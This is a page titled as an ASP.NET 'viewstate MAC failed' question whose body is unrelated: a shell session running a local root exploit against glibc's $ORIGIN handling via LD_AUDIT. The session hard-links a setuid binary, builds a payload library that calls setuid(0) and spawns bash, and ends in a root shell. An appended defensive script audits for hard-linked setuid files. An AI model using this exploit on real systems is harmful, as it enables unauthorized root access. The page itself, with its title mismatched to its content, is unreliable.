
ASP.NET: page POST causes "Validation of viewstate MAC failed" error

2011-01-13 17:14
# Create a directory in /tmp we can control.
$ mkdir /tmp/exploit

# Link to an suid binary, thus changing the definition of $ORIGIN.
$ ln /bin/ping /tmp/exploit/target

# Open a file descriptor to the target binary (note: some users are surprised
# to learn exec can be used to manipulate the redirections of the current
# shell if a command is not specified. This is what is happening below).
$ exec 3< /tmp/exploit/target

# This descriptor should now be accessible via /proc.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*

# Remove the directory previously created
$ rm -rf /tmp/exploit/

# The /proc link should still exist, but now will be marked deleted.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)

# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().
$ cat > payload.c
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
^D
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ ls -l /tmp/exploit
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*

# Now force the link in /proc to load $ORIGIN via LD_AUDIT.
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
sh-4.1# whoami
root
sh-4.1# id
uid=0(root) gid=500(taviso)
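
The session above depends on its second step: an unprivileged user hard-linking a setuid binary into a directory they control. The following audit script is an added example, not part of the original post; it lists setuid/setgid files that have more than one hard link and reports the kernel's fs.protected_hardlinks setting. The function names and the optional path argument are hypothetical.

```shell
#!/bin/sh
# Added example: audit for hard links to setuid/setgid binaries.

# Print every setuid or setgid regular file under DIR whose link count is
# greater than one. A second name for a privileged binary inside a
# user-writable tree such as /tmp is the precondition of the session above.
find_multilinked_suid() {
    dir=$1
    # -xdev: hard links cannot cross filesystems, so stay on DIR's filesystem.
    find "$dir" -xdev -type f \( -perm -4000 -o -perm -2000 \) -links +1 \
        -print 2>/dev/null
}

# Report the fs.protected_hardlinks sysctl: "enabled", "disabled", or
# "unknown" when the file is absent (older kernels) or unreadable.
# When enabled, a user cannot hard-link a setuid file they do not own,
# which makes the `ln /bin/ping ...` step fail.
# The optional argument overrides the sysctl path (used for testing).
hardlink_protection() {
    f=${1:-/proc/sys/fs/protected_hardlinks}
    if [ -r "$f" ]; then
        case $(cat "$f") in
            1) echo enabled ;;
            0) echo disabled ;;
            *) echo unknown ;;
        esac
    else
        echo unknown
    fi
}

# Stand-alone use: sh audit.sh /tmp /var/tmp /home
if [ "$#" -gt 0 ]; then
    echo "protected_hardlinks: $(hardlink_protection)"
    for d in "$@"; do
        find_multilinked_suid "$d"
    done
fi
```

Some distributions ship legitimate multi-link setuid files in system directories, so a hit matters most under world-writable paths. Use `ls -li` on a reported path to get the inode and locate its other names.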